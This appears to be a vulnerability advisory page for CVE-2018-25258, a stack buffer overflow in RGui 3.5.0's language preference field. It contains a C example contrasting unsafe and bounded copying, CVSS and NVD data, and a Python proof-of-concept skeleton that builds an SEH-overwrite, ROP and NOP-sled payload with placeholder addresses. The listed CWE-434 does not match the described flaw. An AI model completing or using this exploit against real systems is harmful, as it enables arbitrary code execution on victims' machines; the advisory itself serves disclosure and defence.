Security Vulnerability Report
CVE-2018-25258 CVSS 8.4 HIGH

CVE-2018-25258

Published: 2026-04-12 13:16:32
Last Modified: 2026-04-15 15:00:33

Description

RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.
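The description above names the bug class (a fixed-size stack buffer that receives the "Language for menus and messages" value with no length check, so an over-long value overwrites the frame and the SEH record) but the page carries no RGui source. The C snippet below is an added illustration, not RGui's code or the advisory's: the unsafe copy pattern beside a bounded replacement that refuses over-long input instead of truncating it silently. The buffer size `LANG_BUF_SIZE`, the function names and the 'A'-filled test value are assumptions chosen for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the stack buffer that holds the preference value.
 * This is a demonstration value, not RGui's real buffer size. */
#define LANG_BUF_SIZE 64

/* Unsafe pattern (the bug class): the user-supplied value is copied into a
 * fixed stack buffer with no bound. Anything longer than LANG_BUF_SIZE - 1
 * bytes runs past the buffer into saved frame data and, on 32-bit Windows,
 * into the SEH record further up the stack. Never call this with untrusted input. */
void apply_language_unsafe(const char *user_value)
{
    char lang[LANG_BUF_SIZE];
    strcpy(lang, user_value);             /* unbounded copy */
    printf("language set to %s\n", lang);
}

/* Hardened form: scan only within the destination size, reject a value that
 * does not fit (including its terminator), then copy exactly that many bytes.
 * Returns 0 on success, -1 when the input is missing or too long. */
int apply_language_safe(const char *user_value, char *out, size_t out_size)
{
    const char *nul;
    size_t len;

    if (user_value == NULL || out == NULL || out_size == 0)
        return -1;
    nul = memchr(user_value, '\0', out_size);  /* never read past out_size bytes */
    if (nul == NULL)
        return -1;                             /* no terminator within bound: too long */
    len = (size_t)(nul - user_value);
    memcpy(out, user_value, len);
    out[len] = '\0';
    return 0;
}

/* Helper for checking the bound: builds a constructed value of n 'A' bytes
 * (the same filler the PoC uses) and reports what the hardened function does. */
int try_language_of_length(size_t n)
{
    char value[2048];
    char out[LANG_BUF_SIZE];

    if (n >= sizeof value)
        return -2;                             /* outside what this demo constructs */
    memset(value, 'A', n);
    value[n] = '\0';
    return apply_language_safe(value, out, sizeof out);
}

int main(void)
{
    char out[LANG_BUF_SIZE];

    apply_language_unsafe("en");               /* safe only because the input is short */
    printf("short value: %d\n", apply_language_safe("en", out, sizeof out));
    printf("63-byte value: %d\n", try_language_of_length(63));
    printf("64-byte value: %d\n", try_language_of_length(64));
    printf("524-byte value: %d\n", try_language_of_length(524));
    return 0;
}
```

The point of the bounded version is the explicit rejection path: a value that cannot fit with its terminator is refused and the caller can report it, rather than the copy running off the end of the buffer.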

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RGui 3.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# This is a conceptual PoC for the buffer overflow in RGui 3.5.0
# It generates the malicious payload to trigger the SEH overwrite and DEP bypass.
import struct

# Bad characters (example)
bad_chars = b"\x00\x0a\x0d"

# Offset to SEH handler (needs to be calculated via debugging)
offset_seh = 524

# POP POP RET address from a non-ASLR module (Example placeholder)
# In a real scenario, find a reliable address from RGui's loaded DLLs (e.g., MSVCRT.dll)
pop_pop_ret = struct.pack("<I", 0xAAAAAAAA)

# ROP Chain to call VirtualAlloc
# This is a simplified representation
rop_chain = b""
rop_chain += struct.pack("<I", 0xBBBBBBBB)  # Pivot
rop_chain += struct.pack("<I", 0xCCCCCCCC)  # VirtualAlloc
# ... arguments for VirtualAlloc (lpAddress, dwSize, flAllocationType, flProtect)

# Shellcode (Calc.exe example)
shellcode = b"\x90" * 16
# shellcode += b"\x31\xc0..." (Real shellcode here)

# Padding to align
nseh = b"\xeb\x06\x90\x90"  # jmp short 6

# Construct the payload
payload = b"A" * offset_seh
payload += nseh
payload += pop_pop_ret
payload += rop_chain
payload += b"\x90" * 32
payload += shellcode
payload += b"C" * (1000 - len(payload))  # Fill rest of buffer

print(f"Payload Length: {len(payload)}")
# This payload should be set in the 'Language for menus and messages' registry key or input field.
```

References

https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
https://www.exploit-db.com/exploits/46107
https://www.r-project.org/
https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass

Raw JSON Data

```json
{"cve": {"id": "CVE-2018-25258", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:31.740", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46107", "source": "[email protected]"}, {"url": "https://www.r-project.org/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass", "source": "[email protected]"}]}}
```